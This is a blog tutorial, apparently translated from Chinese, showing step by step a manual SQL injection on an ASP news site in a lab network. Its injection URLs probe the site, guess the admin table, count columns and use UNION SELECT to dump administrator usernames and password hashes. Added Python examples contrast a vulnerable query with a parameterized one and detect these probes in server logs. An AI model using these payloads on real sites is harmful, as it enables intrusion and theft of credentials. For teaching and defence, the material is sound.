SQL injection is one of the most common ways attackers compromise a database. The core idea is that the attacker appends a fragment of database query code to a URL that normally passes its parameter to the database, and then infers the data he wants from how the page responds. Below we set up a penetration-testing lab for SQL injection; the final goal is to obtain the site's administrator account and password. Target server IP address: 192.168.80.129; attacker host IP address: 192.168.80.128.
(1) Find the injection point
Open a web page and look at its URL.
An injection point is a page such as "http://192.168.80.129/shownews.asp?id=7" whose URL carries a parameter that is passed on to a database command. Here "shownews.asp?id=7" means the value "id=7" is handed to the page shownews.asp for processing.
We can test this URL by appending "and 1=1" and "and 1=2" to it.
http://192.168.80.129/shownews.asp?id=7 and 1=1, and the page still displays normally.
http://192.168.80.129/shownews.asp?id=7 and 1=2, and the page no longer displays properly.
This shows that shownews.asp passes the "and 1=1" we appended to the database as part of its query. We can therefore construct SQL statements that get executed and return the information we want; this is called an injection vulnerability. A page whose parameter reaches the database query in this way is called an injection point.
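The query pattern behind the "and 1=1" / "and 1=2" test, reproduced with SQLite beside the parameterized version that closes the hole. This is an added example, not code from the original post or from the site's own shownews.asp; the news table, its rows and the two function names are constructed for illustration.

```python
# Added example (not from the original post): the concatenation pattern that
# makes "?id=7 and 1=1" work, beside a parameterized query that refuses it.
# The table, rows and function names are constructed for illustration.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO news VALUES (?, ?)",
                 [(7, "Site notice"), (8, "Second article")])


def shownews_vulnerable(id_param: str):
    """Concatenates the raw ?id= value into the SQL text, as the vulnerable
    page does; whatever follows the number is executed as SQL."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # the real page would show an error instead of content
    return row[0] if row else None


def shownews_safe(id_param: str):
    """Validates the parameter and binds it with a placeholder, so appended
    text can never be interpreted as SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be numeric")
    row = conn.execute("SELECT title FROM news WHERE id=?",
                       (int(id_param),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(shownews_vulnerable("7"))           # Site notice
    print(shownews_vulnerable("7 and 1=1"))   # Site notice (page renders)
    print(shownews_vulnerable("7 and 1=2"))   # None (page breaks)
    print(shownews_safe("7"))                 # Site notice
    try:
        shownews_safe("7 and 1=1")
    except ValueError as err:
        print("rejected:", err)
```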
(2) Guess the name of the table
The main purpose of infiltrating a website is to obtain the webmaster's user name and password. These are stored in a table in the backend database, so first we have to guess the name of that table.
Most often the table is named admin or admin_user, and we can guess the name by appending a statement to the injection-point URL:
http://192.168.80.129/shownews.asp?id=7 and (select COUNT(*) from admin) > 0
"select COUNT(*) from admin" counts the records in the admin table. If the admin table exists, the statement returns a count, the comparison "> 0" holds, and the page displays normally. Conversely, if the admin table does not exist, "select COUNT(*) from admin" returns no value, the comparison fails, and the page does not display properly.
If the page does not display properly, try again with a different table name until it does:
http://192.168.80.129/shownews.asp?id=7 and (select COUNT(*) from Admin_user) > 0
http://192.168.80.129/shownews.asp?id=7 and (select COUNT(*) from Manage_user) > 0
The table name on this website turns out to be manage_user.
Common table names include: admin, sysadmin, manger, admin123, WebAdmin, member, Manage_user.
Note: if you cannot guess the table name, tools such as 明小子 (Ming Xiaozi) can help.
(3) Guess the number of fields
The next step is to find out which fields in the table hold the user name and password; to do that, we first need to know how many fields the table has.
This uses the "ORDER BY" statement. "ORDER BY" sorts the result by a field, so "ORDER BY 10" sorts by the 10th field. If the 10th field exists the page displays normally; if the page does not display properly, the 10th field does not exist.
http://192.168.80.129/shownews.asp?id=7 ORDER BY 11
By raising the number until the page breaks, we find that this table has 11 fields.
(4) Guess field name
The next step is to find out which fields hold the user name and password; this uses a UNION SELECT query.
http://192.168.80.129/shownews.asp?id=7 union select 1,2,3,4,5,6,7,8,9,10,11 from Manage_user
The page then shows the numbers of the field positions that are echoed back; these are the positions where the user name and password can be displayed.
The field holding the user name is usually called username and the field holding the password is usually called password, so replace the 2nd and 3rd positions with these two names:
http://192.168.80.129/shownews.asp?id=7 union select 1,username,password,4,5,6,7,8,9,10,11 from Manage_user
The user name and password are then displayed on the page.
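Seen from the web server's side, steps (1) to (4) leave a recognisable trail in the access log. The following added example (not part of the original post) flags that trail over constructed, simplified IIS W3C-style log lines of the form "date time method uri-stem uri-query client-ip status"; the rule names and the threshold are assumptions.

```python
# Added example (not from the original post): detection of the probe sequence
# walked through above (and 1=1 / 1=2, select count(*) from <table>,
# ORDER BY n, UNION SELECT) over constructed, simplified IIS-style log lines.
import re
from urllib.parse import unquote_plus

RULES = [  # rule names are assumptions; patterns follow the probes shown above
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("table-probe", re.compile(r"select\s+count\s*\(\s*\*\s*\)\s+from\s+\w+", re.I)),
    ("column-count", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
]

# Constructed sample: "date time method uri-stem uri-query client-ip status".
SAMPLE_LOG = """\
2014-10-07 10:01:02 GET /shownews.asp id=7 192.168.80.128 200
2014-10-07 10:01:09 GET /shownews.asp id=7+and+1%3D1 192.168.80.128 200
2014-10-07 10:01:15 GET /shownews.asp id=7+and+1%3D2 192.168.80.128 500
2014-10-07 10:02:30 GET /shownews.asp id=7+and+(select+count(*)+from+admin)%3E0 192.168.80.128 500
2014-10-07 10:04:11 GET /shownews.asp id=7+order+by+11 192.168.80.128 200
2014-10-07 10:05:40 GET /shownews.asp id=7+union+select+1,username,password,4,5,6,7,8,9,10,11+from+Manage_user 192.168.80.128 200
2014-10-07 10:06:00 GET /shownews.asp id=8 192.168.80.130 200
"""


def scan_log(text: str):
    """Return (client_ip, rule, decoded query) for every flagged request."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # malformed or differently shaped line; skip it
        query, client_ip = unquote_plus(parts[4]), parts[5]
        for name, pattern in RULES:
            if pattern.search(query):
                hits.append((client_ip, name, query))
                break  # one rule per request is enough for alerting
    return hits


def suspects(text: str, threshold: int = 3):
    """Client IPs whose number of flagged requests reaches the threshold."""
    counts = {}
    for ip, _, _ in scan_log(text):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

A single "and 1=1" can be a false positive, so the threshold groups the probes per client before alerting.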
(5) Guess the backend management entrance
In this Southern Data (南方数据) 2.0 template the site itself provides an "administrator login" link. Most sites today do not expose one, so the entrance is usually guessed from experience: the management portal is generally placed in a subdirectory named admin. Entering the following address, http://192.168.80.129/admin, brings up the management portal automatically.
Here you can log in with the administrator account and password revealed earlier, but the password "3acdbb255b45d296" is obviously an MD5 hash. How can it be cracked? That will be covered in the next blog article.
This article is from the blog "A Pot of Turbid Wine"; please contact the author before reproducing it.
Network Security Series (4): Manual SQL Injection (ASP)